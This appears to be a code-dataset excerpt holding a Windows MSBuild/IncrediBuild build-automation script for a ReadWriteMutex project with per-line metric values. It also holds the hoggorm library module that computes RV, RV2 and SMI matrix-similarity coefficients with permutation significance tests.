[ "#!python3\n", "# -*- coding:utf-8 -*-\n", "import os\n", "import sys\n", "import time\n", "import ctypes\n", "import shutil\n", "import subprocess\n", "IsPy3 = sys.version_info[0] >= 3\n", "if IsPy3:\n", " import winreg\n", "else:\n", " import codecs\n", " import _winreg as winreg\n", "\n", "BuildType = 'Release'\n", "IsRebuild = True\n", "Build = 'Rebuild'\n", "Update = False\n", "Copy = False\n", "CleanAll = False\n", "BuildTimeout = 30*60\n", "Bit = 'Win32'\n", "Dlllib = 'dll'\n", "MSBuild = None\n", "IncrediBuild = None\n", "UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译\n", "\n", "#不同项目只需修改下面5个变量\n", "SlnFile = '../ReadWriteMutex.sln' #相对于本py脚本路径的相对路径\n", "UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新\n", "ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行\n", "MSBuildFirstProjects = [r'ReadWriteMutex'] #使用MSBuild需要工程文件在解决方案sln中的路径\n", " # MSBuild首先编译的项目,填空不指定顺序\n", "IncrediBuildFirstProjects = ['ReadWriteMutex'] #使用IncrediBuild只需工程名字\n", " #IncrediBuild首先编译的项目,填空不指定顺序\n", "\n", "class ConsoleColor():\n", " '''This class defines the values of color for printing on console window'''\n", " Black = 0\n", " DarkBlue = 1\n", " DarkGreen = 2\n", " DarkCyan = 3\n", " DarkRed = 4\n", " DarkMagenta = 5\n", " DarkYellow = 6\n", " Gray = 7\n", " DarkGray = 8\n", " Blue = 9\n", " Green = 10\n", " Cyan = 11\n", " Red = 12\n", " Magenta = 13\n", " Yellow = 14\n", " White = 15\n", "\n", "class Coord(ctypes.Structure):\n", " _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)]\n", "\n", "class SmallRect(ctypes.Structure):\n", " _fields_ = [('Left', ctypes.c_short),\n", " ('Top', ctypes.c_short),\n", " ('Right', ctypes.c_short),\n", " ('Bottom', ctypes.c_short),\n", " ]\n", "\n", "class ConsoleScreenBufferInfo(ctypes.Structure):\n", " _fields_ = [('dwSize', Coord),\n", " ('dwCursorPosition', Coord),\n", " ('wAttributes', ctypes.c_uint),\n", " ('srWindow', SmallRect),\n", " ('dwMaximumWindowSize', Coord),\n", " ]\n", "\n", "class Win32API():\n", " '''Some native methods for python calling'''\n", " StdOutputHandle = -11\n", " ConsoleOutputHandle = None\n", " DefaultColor = None\n", "\n", " @staticmethod\n", " def SetConsoleColor(color):\n", " '''Change the text color on console window'''\n", " if not Win32API.DefaultColor:\n", " if not Win32API.ConsoleOutputHandle:\n", " Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle)\n", " bufferInfo = ConsoleScreenBufferInfo()\n", " ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo))\n", " Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF)\n", " if IsPy3:\n", " sys.stdout.flush() # need flush stdout in python 3\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color)\n", "\n", " @staticmethod\n", " def ResetConsoleColor():\n", " '''Reset the default text color on console window'''\n", " if IsPy3:\n", " sys.stdout.flush() # need flush stdout in python 3\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor)\n", "\n", "class Logger():\n", " LogFile = '@AutomationLog.txt'\n", " LineSep = '\\n'\n", " @staticmethod\n", " def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True):\n", " '''\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\n", " if consoleColor == -1, use default color\n", " '''\n", " if printToStdout:\n", " isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White)\n", " if isValidColor:\n", " Win32API.SetConsoleColor(consoleColor)\n", " try:\n", " sys.stdout.write(log)\n", " except UnicodeError as e:\n", " Win32API.SetConsoleColor(ConsoleColor.Red)\n", " isValidColor = True\n", " sys.stdout.write(str(type(e)) + ' can\\'t print the log!\\n')\n", " if isValidColor:\n", " Win32API.ResetConsoleColor()\n", " if not writeToFile:\n", " return\n", " if IsPy3:\n", " logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8')\n", " else:\n", " logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8')\n", " try:\n", " logFile.write(log)\n", " # logFile.flush() # need flush in python 3, otherwise log won't be saved\n", " except Exception as ex:\n", " logFile.close()\n", " sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex))\n", "\n", " @staticmethod\n", " def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True):\n", " '''\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\n", " if consoleColor == -1, use default color\n", " '''\n", " Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout)\n", "\n", " @staticmethod\n", " def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True):\n", " '''\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\n", " if consoleColor == -1, use default color\n", " '''\n", " t = time.localtime()\n", " log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday,\n", " t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep)\n", " Logger.Write(log, consoleColor, writeToFile, printToStdout)\n", "\n", " @staticmethod\n", " def DeleteLog():\n", " if os.path.exists(Logger.LogFile):\n", " os.remove(Logger.LogFile)\n", "\n", "\n", "def GetMSBuildPath():\n", " if Bit == 'Win32':\n", " cmd = 'call \"%VS120COMNTOOLS%..\\\\..\\\\VC\\\\vcvarsall.bat\" x86\\nwhere msbuild'\n", " elif Bit == 'x64':\n", " cmd = 'call \"%VS120COMNTOOLS%..\\\\..\\\\VC\\\\vcvarsall.bat\" amd64\\nwhere msbuild'\n", " ftemp = open('GetMSBuildPath.bat', 'wt')\n", " ftemp.write(cmd)\n", " ftemp.close()\n", " p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE)\n", " p.wait()\n", " lines = p.stdout.read().decode().splitlines()\n", " os.remove('GetMSBuildPath.bat')\n", " for line in lines:\n", " if 'MSBuild.exe' in line:\n", " return line\n", "\n", "def GetIncrediBuildPath():\n", " try:\n", " key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\\Classes\\IncrediBuild.MonitorFile\\shell\\open\\command')\n", " value, typeId = winreg.QueryValueEx(key, '')\n", " if value:\n", " start = value.find('\"')\n", " end = value.find('\"', start + 1)\n", " path = value[start+1:end]\n", " buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe')\n", " return buildConsole\n", " except FileNotFoundError as e:\n", " Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red)\n", "\n", "def UpdateCode():\n", " # put git to path first\n", " if not shutil.which('git.exe'):\n", " Logger.Log('找不到git.exe. 请确认安装git时将git\\bin目录路径加入到环境变量path中!!!\\n, 跳过更新代码!!!', ConsoleColor.Yellow)\n", " return false\n", " oldDir = os.getcwd()\n", " for dir in UpdateDir:\n", " os.chdir(dir)\n", " ret = os.system('git pull')\n", " os.chdir(oldDir)\n", " if ret != 0:\n", " Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow)\n", " return false\n", " return True\n", "\n", "def BuildProject(cmd):\n", " for i in range(6):\n", " Logger.WriteLine(cmd, ConsoleColor.Cyan)\n", " buildFailed = True\n", " startTime = time.time()\n", " p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug\n", " if IsPy3:\n", " try:\n", " buildFailed = p.wait(BuildTimeout)\n", " except subprocess.TimeoutExpired as e:\n", " Logger.Log('{0}'.format(e), ConsoleColor.Yellow)\n", " p.kill()\n", " else:\n", " buildFailed = p.wait()\n", " if not UseMSBuild:\n", " #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断\n", " fin = open('IncrediBuild.log')\n", " for line in fin:\n", " if line.startswith('=========='):\n", " Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False)\n", " if IsPy3:\n", " start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ==========\n", " else:#为了兼容py2做的特殊处理,很恶心\n", " start = 0\n", " n2 = 0\n", " while 1:\n", " if line[start].isdigit():\n", " n2 += 1\n", " if n2 == 2:\n", " break\n", " start = line.find(' ', start)\n", " start += 1\n", " end = line.find(' ', start)\n", " failCount = int(line[start:end])\n", " buildFailed = failCount > 0\n", " else:\n", " Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False)\n", " fin.close()\n", " costTime = time.time() - startTime\n", " Logger.WriteLine('build cost time: {0:.1f}s\\n'.format(costTime), ConsoleColor.Green)\n", " if not buildFailed:\n", " return True\n", " return False\n", "\n", "def BuildAllProjects():\n", " buildSuccess = False\n", " cmds = []\n", " if UseMSBuild:\n", " if IsRebuild:\n", " if CleanAll:\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug'))\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release'))\n", " else:\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))\n", " for project in MSBuildFirstProjects:\n", " cmds.append('{0} {1} /t:{2} /p:Configuration={3};platform={4} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType, Bit))\n", " cmds.append('{0} {1} /p:Configuration={2};platform={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType, Bit))\n", " else: #IncrediBuild\n", " if IsRebuild:\n", " if CleanAll:\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug', Bit))\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release', Bit))\n", " else:\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit))\n", " for project in IncrediBuildFirstProjects:\n", " cmds.append('\"{0}\" {1} /build /prj={2} /cfg=\"{3}|{4}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType, Bit))\n", " cmds.append('\"{0}\" {1} /build /cfg=\"{2}|{3}\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit))\n", " for cmd in cmds:\n", " buildSuccess = BuildProject(cmd)\n", " if not buildSuccess:\n", " break\n", " return buildSuccess\n", "\n", "def main():\n", " if UseMSBuild:\n", " if not os.path.exists(MSBuild):\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\n", " return 1\n", " else:\n", " if not os.path.exists(IncrediBuild):\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\n", " return 1\n", " dir = os.path.dirname(__file__)\n", " if dir:\n", " oldDir = os.getcwd()\n", " os.chdir(dir)\n", " if Update:\n", " if not UpdateCode():\n", " return 1\n", " Logger.Log('git update succeed', ConsoleColor.Green)\n", " if Copy:\n", " for bat in ExecBatList:\n", " oldBatDir = os.getcwd()\n", " batDir = os.path.dirname(bat)\n", " batName = os.path.basename(bat)\n", " if batDir:\n", " os.chdir(batDir)\n", " start = time.clock()\n", " os.system(batName)\n", " Logger.Log('run \"{}\" cost {:.1f} seconds'.format(batName, time.clock() - start), ConsoleColor.Green)\n", " if batDir:\n", " os.chdir(oldBatDir)\n", " buildSuccess = BuildAllProjects()\n", " if buildSuccess:\n", " Logger.Log('build succeed', ConsoleColor.Green)\n", " else:\n", " Logger.Log('build failed', ConsoleColor.Red)\n", " if dir:\n", " os.chdir(oldDir)\n", " return 0 if buildSuccess else 1\n", "\n", "if __name__ == '__main__':\n", " Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green)\n", " sys.argv = [x.lower() for x in sys.argv]\n", " start_time = time.time()\n", " if 'debug' in sys.argv:\n", " BuildType = 'Debug'\n", " if 'lib' in sys.argv:\n", " Dlllib = 'lib'\n", " SlnFile = '../ReadWriteMutex_lib.sln'\n", " MSBuildFirstProjects = [r'ReadWriteMutex_lib']\n", " IncrediBuildFirstProjects = ['ReadWriteMutex_lib']\n", " if '64' in sys.argv:\n", " Bit = 'x64'\n", " if 'build' in sys.argv:\n", " IsRebuild = False\n", " Build = 'Build'\n", " if 'update' in sys.argv:\n", " Update = True\n", " if 'copy' in sys.argv:\n", " Copy = True\n", " if 'clean' in sys.argv:\n", " CleanAll = True\n", " if 'incredibuild' in sys.argv:\n", " UseMSBuild = False\n", " if UseMSBuild:\n", " MSBuild = GetMSBuildPath()\n", " if not MSBuild:\n", " Logger.Log('can not find MSBuild.exe', ConsoleColor.Red)\n", " exit(1)\n", " else:\n", " IncrediBuild = GetIncrediBuildPath()\n", " if not IncrediBuild:\n", " Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red)\n", " exit(1)\n", " cwd = os.getcwd()\n", " Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType))\n", " ret = main()\n", " end_time = time.time()\n", " cost_time = end_time-start_time\n", " Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green)\n", " exit(ret)" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03508771929824561, 0, 0.0625, 0.0392156862745098, 0.05263157894736842, 0.030303030303030304, 0.027777777777777776, 0.06666666666666667, 0.028985507246376812, 0.08823529411764706, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.02857142857142857, 0, 0.025, 0.023809523809523808, 0.023255813953488372, 0.0625, 0, 0.02040816326530612, 0, 0.022727272727272728, 0.02127659574468085, 0.025, 0.02127659574468085, 0.0625, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009174311926605505, 0, 0.00847457627118644, 0, 0, 0.015873015873015872, 0.010869565217391304, 0, 0, 0, 0, 0, 0.015873015873015872, 0.009259259259259259, 0, 0.0625, 0, 0, 0.05555555555555555, 0.08641975308641975, 0, 0.012195121951219513, 0, 0, 0, 0.009708737864077669, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.028985507246376812, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0.010526315789473684, 0, 0, 0.08235294117647059, 0, 0.012195121951219513, 0, 0, 0.011764705882352941, 0, 0, 0.0759493670886076, 0, 0.012195121951219513, 0, 0, 0, 0.009708737864077669, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0.011627906976744186, 0, 0, 0, 0.0273972602739726, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.01680672268907563, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0.05555555555555555, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0, 0, 0.030612244897959183, 0, 0.018518518518518517, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.033112582781456956, 0, 0, 0.010752688172043012, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0.005813953488372093, 0.005747126436781609, 0, 0.005747126436781609, 0, 0.00510204081632653, 0.005714285714285714, 0.08333333333333333, 0, 0, 0.0072992700729927005, 0.007194244604316547, 0, 0.007194244604316547, 0, 0.006535947712418301, 0.007633587786259542, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008849557522123894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0.010101010101010102, 0.07692307692307693 ]
355
0.006469
false
# -*- coding: utf-8 -*- import numpy import hoggorm.statTools as st def RVcoeff(dataList): """ This function computes the RV matrix correlation coefficients between pairs of arrays. The number and order of objects (rows) for the two arrays must match. The number of variables in each array may vary. Reference: `The STATIS method`_ .. _The STATIS method: https://www.utdallas.edu/~herve/Abdi-Statis2007-pretty.pdf PARAMETERS ---------- dataList : list A list holding numpy arrays for which the RV coefficient will be computed. RETURNS ------- numpy array A numpy array holding RV coefficients for pairs of numpy arrays. The diagonal in the result array holds ones, since RV is computed on identical arrays, i.e. first array in ``dataList`` against frist array in Examples -------- >>> import hoggorm as ho >>> import numpy as np >>> >>> # Generate some random data. Note that number of rows must match across arrays >>> arr1 = np.random.rand(50, 100) >>> arr2 = np.random.rand(50, 20) >>> arr3 = np.random.rand(50, 500) >>> >>> # Center the data before computation of RV coefficients >>> arr1_cent = arr1 - np.mean(arr1, axis=0) >>> arr2_cent = arr2 - np.mean(arr2, axis=0) >>> arr3_cent = arr3 - np.mean(arr3, axis=0) >>> >>> # Compute RV matrix correlation coefficients on mean centered data >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent]) >>> array([[ 1. , 0.41751839, 0.77769025], [ 0.41751839, 1. , 0.51194496], [ 0.77769025, 0.51194496, 1. ]]) >>> >>> # Get RV for arr1_cent and arr2_cent >>> rv_results[0, 1] 0.41751838661314689 >>> >>> # or >>> rv_results[1, 0] 0.41751838661314689 >>> >>> # Get RV for arr2_cent and arr3_cent >>> rv_results[1, 2] 0.51194496245209853 >>> >>> # or >>> rv_results[2, 1] 0.51194496245209853 """ # First compute the scalar product matrices for each data set X scalArrList = [] for arr in dataList: scalArr = numpy.dot(arr, numpy.transpose(arr)) scalArrList.append(scalArr) # Now compute the 'between study cosine matrix' C C = numpy.zeros((len(dataList), len(dataList)), float) for index, element in numpy.ndenumerate(C): nom = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[1]])) denom1 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[0]])) denom2 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[1]]), scalArrList[index[1]])) Rv = nom / numpy.sqrt(numpy.dot(denom1, denom2)) C[index[0], index[1]] = Rv return C def RV2coeff(dataList): """ This function computes the RV matrix correlation coefficients between pairs of arrays. The number and order of objects (rows) for the two arrays must match. The number of variables in each array may vary. The RV2 coefficient is a modified version of the RV coefficient with values -1 <= RV2 <= 1. RV2 is independent of object and variable size. Reference: `Matrix correlations for high-dimensional data - the modified RV-coefficient`_ .. _Matrix correlations for high-dimensional data - the modified RV-coefficient: https://academic.oup.com/bioinformatics/article/25/3/401/244239 PARAMETERS ---------- dataList : list A list holding an arbitrary number of numpy arrays for which the RV coefficient will be computed. RETURNS ------- numpy array A list holding an arbitrary number of numpy arrays for which the RV coefficient will be computed. Examples -------- >>> import hoggorm as ho >>> import numpy as np >>> >>> # Generate some random data. Note that number of rows must match across arrays >>> arr1 = np.random.rand(50, 100) >>> arr2 = np.random.rand(50, 20) >>> arr3 = np.random.rand(50, 500) >>> >>> # Center the data before computation of RV coefficients >>> arr1_cent = arr1 - np.mean(arr1, axis=0) >>> arr2_cent = arr2 - np.mean(arr2, axis=0) >>> arr3_cent = arr3 - np.mean(arr3, axis=0) >>> >>> # Compute RV matrix correlation coefficients on mean centered data >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent]) >>> array([[ 1. , -0.00563174, 0.04028299], [-0.00563174, 1. , 0.08733739], [ 0.04028299, 0.08733739, 1. ]]) >>> >>> # Get RV for arr1_cent and arr2_cent >>> rv_results[0, 1] -0.00563174 >>> >>> # or >>> rv_results[1, 0] -0.00563174 >>> >>> # Get RV for arr2_cent and arr3_cent >>> rv_results[1, 2] 0.08733739 >>> >>> # or >>> rv_results[2, 1] 0.08733739 """ # First compute the scalar product matrices for each data set X scalArrList = [] for arr in dataList: scalArr = numpy.dot(arr, numpy.transpose(arr)) diego = numpy.diag(numpy.diag(scalArr)) scalArrMod = scalArr - diego scalArrList.append(scalArrMod) # Now compute the 'between study cosine matrix' C C = numpy.zeros((len(dataList), len(dataList)), float) for index, element in numpy.ndenumerate(C): nom = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[1]])) denom1 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[0]]), scalArrList[index[0]])) denom2 = numpy.trace( numpy.dot(numpy.transpose(scalArrList[index[1]]), scalArrList[index[1]])) Rv = nom / numpy.sqrt(denom1 * denom2) C[index[0], index[1]] = Rv return C class SMI: """ Similarity of Matrices Index (SMI) A similarity index for comparing coupled data matrices. A two-step process starts with extraction of stable subspaces using Principal Component Analysis or some other method yielding two orthonormal bases. These bases are compared using Orthogonal Projection (OP / ordinary least squares) or Procrustes Rotation (PR). The result is a similarity measure that can be adjusted to various data sets and contexts and which includes explorative plotting and permutation based testing of matrix subspace equality. Reference: `A similarity index for comparing coupled matrices`_ .. _A similarity index for comparing coupled matrices: https://onlinelibrary.wiley.com/doi/abs/10.1002/cem.3049 PARAMETERS ---------- X1 : numpy array first matrix to be compared. X2 : numpy array second matrix to be compared. ncomp1 : int, optional maximum number of subspace components from the first matrix. ncomp2 : int, optional maximum number of subspace components from the second matrix. projection : list, optional type of projection to apply, defaults to "Orthogonal", alternatively "Procrustes". Scores1 : numpy array, optional user supplied score-matrix to replace singular value decomposition of first matrix. Scores2 : numpy array, optional user supplied score-matrix to replace singular value decomposition of second matrix. RETURNS ------- An SMI object containing all combinations of components. EXAMPLES -------- >>> import numpy as np >>> import hoggorm as ho >>> X1 = ho.center(np.random.rand(100, 300)) >>> U, s, V = np.linalg.svd(X1, 0) >>> X2 = np.dot(np.dot(np.delete(U, 2, 1), np.diag(np.delete(s, 2))), np.delete(V, 2, 0)) >>> smiOP = ho.SMI(X1, X2, ncomp1=10, ncomp2=10) >>> smiPR = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, projection="Procrustes") >>> smiCustom = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, Scores1=U) >>> print(smiOP.smi) >>> print(smiOP.significance()) >>> print(smiPR.significance(B=100)) """ def __init__(self, X1, X2, **kargs): # Check dimensions assert numpy.shape(X1)[0] == numpy.shape(X2)[0], ValueError( "Number of objects must be equal in X1 and X2") # Check number of components against rank rank1 = st.matrixRank(X1) rank2 = st.matrixRank(X2) if "ncomp1" not in kargs.keys(): self.ncomp1 = rank1 else: self.ncomp1 = kargs["ncomp1"] if "ncomp2" not in kargs.keys(): self.ncomp2 = rank2 else: self.ncomp2 = kargs["ncomp2"] assert self.ncomp1 <= rank1, ValueError( "Number of components for X1 cannot be higher than the rank of X1") assert self.ncomp2 <= rank2, ValueError( "Number of components for X2 cannot be higher than the rank of X2") # Handle projection types if "projection" not in kargs.keys(): self.projection = "Orthogonal" else: self.projection = kargs["projection"] assert self.projection in [ "Orthogonal", "Procrustes" ], ValueError("Unknown projection, should be Orthogonal or Procrustes") # Calculate scores if needed if "Scores1" not in kargs.keys(): Scores1, s, V = numpy.linalg.svd(X1 - numpy.mean(X1, axis=0), 0) else: Scores1 = kargs["Scores1"] if "Scores2" not in kargs.keys(): Scores2, s, V = numpy.linalg.svd(X2 - numpy.mean(X2, axis=0), 0) else: Scores2 = kargs["Scores2"] # Compute SMI values if self.projection == "Orthogonal": self.smi = numpy.cumsum( numpy.cumsum( numpy.square( numpy.dot( numpy.transpose(Scores1[:, :self.ncomp1]), Scores2[:, :self.ncomp2], )), axis=1, ), axis=0, ) / (numpy.reshape( numpy.min( numpy.vstack([ numpy.tile(range(self.ncomp1), self.ncomp1), numpy.repeat(range(self.ncomp2), self.ncomp2), ]), 0, ), [self.ncomp1, self.ncomp2], ) + 1) else: # Procrustes self.smi = numpy.zeros([self.ncomp1, self.ncomp2]) TU = numpy.dot( numpy.transpose(Scores1[:, 0:self.ncomp1]), Scores2[:, 0:self.ncomp2], ) for p in range(self.ncomp1): for q in range(self.ncomp2): U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1]) self.smi[p, q] = numpy.square(numpy.mean(s)) # Recover wrong calculations (due to numerics) self.smi[self.smi > 1] = 1 self.smi[self.smi < 0] = 0 self.N = numpy.shape(Scores1)[0] self.Scores1 = Scores1 self.Scores2 = Scores2 def significance(self, **kargs): """ Significance estimation for Similarity of Matrices Index (SMI) For each combination of components significance is estimated by sampling from a null distribution of no similarity, i.e. when the rows of one matrix is permuted B times and corresponding SMI values are computed. If the vector replicates is included, replicates will be kept together through permutations. PARAMETERS ---------- B integer : int, optional number of permutations, default = 10000. replicates : numpy array integer vector of replicates (must be balanced). RETURNS ------- An array containing P-values for all combinations of components. """ if "B" not in kargs.keys(): B = 10000 else: B = kargs["B"] P = numpy.zeros([self.ncomp1, self.ncomp2]) if self.projection == "Orthogonal": m = (numpy.reshape( numpy.min( numpy.vstack([ numpy.tile(range(self.ncomp1), self.ncomp1), numpy.repeat(range(self.ncomp2), self.ncomp2), ]), 0, ), [self.ncomp1, self.ncomp2], ) + 1) if "replicates" not in kargs.keys(): BScores1 = self.Scores1.copy() i = 0 while i < B: numpy.random.shuffle(BScores1) smiB = (numpy.cumsum( numpy.cumsum( numpy.square( numpy.dot( numpy.transpose(BScores1[:, :self.ncomp1]), self.Scores2[:, :self.ncomp2], )), axis=1, ), axis=0, ) / m) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 else: # With replicates AScores1 = self.Scores1.copy() BScores1 = self.Scores1.copy() i = 0 replicates = kargs["replicates"] uni = numpy.unique(replicates, return_inverse=True) vecOut = numpy.array(range(numpy.shape(uni[0])[0])) vecIn = numpy.array(range(sum(uni[1] == 0))) nOut = len(vecOut) nIn = len(vecIn) while i < B: numpy.random.shuffle( vecOut) # Permute across replicate sets for j in range(nOut): numpy.random.shuffle( vecIn) # Permute inside replicate sets BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) + vecIn, :] smiB = (numpy.cumsum( numpy.cumsum( numpy.square( numpy.dot( numpy.transpose(BScores1[:, :self.ncomp1]), self.Scores2[:, :self.ncomp2], )), axis=1, ), axis=0, ) / m) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 else: if "replicates" not in kargs.keys(): BScores1 = self.Scores1.copy() i = 0 smiB = numpy.zeros([self.ncomp1, self.ncomp2]) while i < B: numpy.random.shuffle(BScores1) # Permutation of rows TU = numpy.dot( numpy.transpose(BScores1[:, 0:self.ncomp1]), self.Scores2[:, 0:self.ncomp2], ) for p in range(self.ncomp1): for q in range(self.ncomp2): U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1]) smiB[p, q] = numpy.square(numpy.mean(s)) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 else: # With replicates AScores1 = self.Scores1.copy() BScores1 = self.Scores1.copy() i = 0 smiB = numpy.zeros([self.ncomp1, self.ncomp2]) replicates = kargs["replicates"] uni = numpy.unique(replicates, return_inverse=True) vecOut = numpy.array(range(numpy.shape(uni[0])[0])) vecIn = numpy.array(range(sum(uni[1] == 0))) nOut = len(vecOut) nIn = len(vecIn) while i < B: numpy.random.shuffle( vecOut) # Permute across replicate sets for j in range(nOut): numpy.random.shuffle( vecIn) # Permute inside replicate sets BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) + vecIn, :] TU = numpy.dot( numpy.transpose(BScores1[:, 0:self.ncomp1]), self.Scores2[:, 0:self.ncomp2], ) for p in range(self.ncomp1): for q in range(self.ncomp2): U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1]) smiB[p, q] = numpy.square(numpy.mean(s)) # Increase P-value if non-significant permutation P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1 i += 1 return P / B
[ "# -*- coding: utf-8 -*-\n", "\n", "import numpy\n", "import hoggorm.statTools as st\n", "\n", "\n", "def RVcoeff(dataList):\n", " \"\"\"\n", " This function computes the RV matrix correlation coefficients between pairs\n", " of arrays. The number and order of objects (rows) for the two arrays must\n", " match. The number of variables in each array may vary.\n", "\n", " Reference: `The STATIS method`_\n", "\n", " .. _The STATIS method: https://www.utdallas.edu/~herve/Abdi-Statis2007-pretty.pdf\n", "\n", " PARAMETERS\n", " ----------\n", " dataList : list\n", " A list holding numpy arrays for which the RV coefficient will be computed.\n", "\n", " RETURNS\n", " -------\n", " numpy array\n", " A numpy array holding RV coefficients for pairs of numpy arrays. The\n", " diagonal in the result array holds ones, since RV is computed on\n", " identical arrays, i.e. first array in ``dataList`` against frist 